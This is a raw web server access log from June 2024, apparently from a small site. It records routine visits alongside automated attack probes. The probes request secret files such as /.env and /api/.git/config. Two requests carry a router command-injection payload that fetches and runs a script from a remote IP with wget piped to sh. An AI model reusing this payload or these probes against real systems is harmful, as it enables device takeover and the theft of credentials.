87.236.176.23 - - [04/Jun/2024:22:28:56 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
83.97.73.245 - - [04/Jun/2024:22:50:16 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.52.109.113 - - [04/Jun/2024:22:52:02 +0200] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
185.191.126.213 - - [04/Jun/2024:23:16:35 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
87.121.69.52 - - [04/Jun/2024:23:37:12 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
83.147.52.49 - - [05/Jun/2024:00:30:37 +0200] "GET /api/.git/config HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Linux; Android 11; Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
192.44.68.152 - - [05/Jun/2024:00:47:11 +0200] "GET /download/file.php?id=255&sid=16df65a13b05d087846f52adc46a40e1 HTTP/1.1" 404 373 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.152 - - [05/Jun/2024:00:47:11 +0200] "GET /download/file.php?id=255&sid=16df65a13b05d087846f52adc46a40e1 HTTP/1.1" 404 373 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.152 - - [05/Jun/2024:00:47:12 +0200] "GET /download/file.php?id=255&sid=16df65a13b05d087846f52adc46a40e1 HTTP/1.1" 404 373 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.179 - - [05/Jun/2024:00:47:12 +0200] "GET /download/file.php?id=255&sid=16df65a13b05d087846f52adc46a40e1 HTTP/1.1" 404 373 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
118.194.236.134 - - [05/Jun/2024:00:47:16 +0200] "\x16\x03\x01\x01\x17\x01" 400 383 "-" "-"
118.194.236.134 - - [05/Jun/2024:00:47:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
118.194.236.134 - - [05/Jun/2024:00:47:27 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.194.236.134 - - [05/Jun/2024:00:47:28 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.194.236.134 - - [05/Jun/2024:00:47:28 +0200] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
31.220.1.83 - - [05/Jun/2024:00:51:19 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.198%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
78.153.140.179 - - [05/Jun/2024:01:16:01 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.179 - - [05/Jun/2024:01:16:01 +0200] "\x16\x03\x01" 400 383 "-" "-"
5.189.156.66 - - [05/Jun/2024:01:17:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.220.1.83 - - [05/Jun/2024:01:22:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.198%2Ft+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
176.197.82.110 - - [05/Jun/2024:01:28:30 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
83.147.52.49 - - [05/Jun/2024:01:28:33 +0200] "GET /api/.git/config HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Linux; Android 11; Mi Note 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36"